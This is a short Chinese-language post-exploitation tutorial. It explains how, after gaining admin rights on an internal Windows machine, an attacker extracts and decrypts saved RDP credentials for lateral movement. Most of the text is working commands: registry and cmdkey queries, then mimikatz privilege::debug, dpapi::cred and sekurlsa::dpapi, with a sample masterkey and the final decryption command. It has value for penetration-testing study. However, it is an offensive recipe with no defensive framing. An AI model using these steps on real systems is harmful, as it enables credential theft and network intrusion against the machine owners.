前言
在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的连接RDP密码进行解密,解密成功后可使用此凭据继续横向移动。
查看远程连接历史
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
查看rdp文件
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
记住这个C:\Users\Lion\AppData\Local\Microsoft\Credentials\
凭证目录,后面要用
如果在远程桌面连接勾选,允许我保存凭证
勾选记住我的凭证,将产生一个新的凭证
查看凭证
cmdkey /list
也可以打开控制面板->凭据管理器 查看凭证
获取guidMasterKey
mimikatz下可解密,我的凭证目录就是C:\Users\Lion\AppData\Local\Microsoft\Credentials\
, dpapi::cred /in:凭证目录\凭证文件
,凭证文件随便一个都可以,因为解出来的guidMasterKey都是一样的。
privilege::debug
dpapi::cred /in:C:\Users\Lion\AppData\Local\Microsoft\Credentials\1F21DFB92A4E59D0FE5E17C164547656
得到guidMasterKey为5f7b6b6e-419f-4993-b9f9-85224ba91cae
获取Masterkey
sekurlsa::dpapi
根据guidMasterKey找到对应的Masterkey
得到masterkey为bf4a60021b82a639df2bd8cc01bbdf7e9ab4e0365f2ade1d35af0273767aba0d6be9374cfdeccd9f9f14acce26dcd7483364dd8b3ab8936d058103ccfdfc7494
解密RDP凭证
dpapi::cred /in:C:\Users\Lion\AppData\Local\Microsoft\Credentials\1F21DFB92A4E59D0FE5E17C164547656 /masterkey:bf4a60021b82a639df2bd8cc01bbdf7e9ab4e0365f2ade1d35af0273767aba0d6be9374cfdeccd9f9f14acce26dcd7483364dd8b3ab8936d058103ccfdfc7494